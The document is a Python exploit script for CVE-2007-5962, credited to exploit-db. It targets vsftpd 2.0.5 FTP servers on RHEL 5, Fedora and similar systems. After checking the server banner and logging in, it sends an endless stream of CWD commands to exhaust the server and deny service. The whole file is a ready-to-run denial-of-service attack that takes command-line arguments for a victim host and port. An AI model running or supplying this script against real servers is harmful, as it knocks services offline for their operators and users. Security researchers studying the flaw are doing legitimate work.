#!/usr/bin/env python3
"""
	Credits: 		Praveen Darshanam		
	Github Author:	https://github.com/praveendhac
	Email:			praveen[underscore]recker[at]sify.com 	
	Source:			https://www.exploit-db.com/exploits/5814

	Name: 			CVE-2007-5962
	Description:	vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, 
					Fedora 6 to 8, Foresight Linux, rPath Linux is prone to 
					Denial-of-Service(DoS) vulnerabilty.Can be xploited by large 
					number of CWD commands to vsftp daemon with deny_file 
					configuration option in /etc/vsftpd/vsftpd.conf or the path 
					where FTP server is installed.
	
	Type exploit:	DOS
	
	Platform: 		Red Hat Enterprise(RHEL) 5, Fedora 6/8, Foresight Linux, rPath Linux
	

"""

#!coding=utf-8

#	
#	[+] this script was created from: antogit-sys 
#	[+] URL: https://github.com/antogit-sys/CVE-2007-5962
#	[+] LICENSE: GPLv3
#

import argparse
from time import sleep
from exploitModuleFTP import *

def main(victim, port, username, passwd):
	emf = exploitModuleFTP(victim, port)
	print("[*] Starting Exploit... 🚀")
	print(f"[*] Connect ftp in ({victim}, {port})")

	resp = emf.connectServer()
	if resp != False:
		print("[*] Execute Exploit...")
		exec_exploit(emf, username, passwd, resp)
	else:
		emf.close_connection()
		print("[✘] failed to connect !!")

def exec_exploit(emf, u, p, r):
	bannerServer = str(r)
	if "(vsFTPd 2.0.5)" in bannerServer:
		print("[*] Server response:")
		print(bannerServer)
		print(f"\n[*] Login {emf.ip} server...")
		print(f" ... USER {u}")
		sleep(1)
		print(f" ... PASS {p}")
		sleep(1)
		
		r = emf.login(u, p)
        
		if r == False:
			print("\n[✘] username or password incorrect !!")
		else:
			print("\n[*] Server response:")
			print(r)
			sleep(1)
			__exploit(emf,"./")
	else:
		print("[!] vsFTPd server with version other than 2.0.5")
def __exploit(emf, directory):
	try:
		while True:
			print(emf.changeDir(str(directory)))
	except KeyboardInterrupt:
		print("\nBye Bye...")
		emf.ftp.quit()

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="simple python exploit using CVE-2007-5962")
	parser.add_argument("victim", help="Victim server vsftpd 2.0.5")
	parser.add_argument("port", type=int, help="Port server vsftpd 2.0.5")
	parser.add_argument("username", help="username login")
	parser.add_argument("passwd", help="password login")
	args = parser.parse_args()
	main(args.victim, args.port, args.username, args.passwd)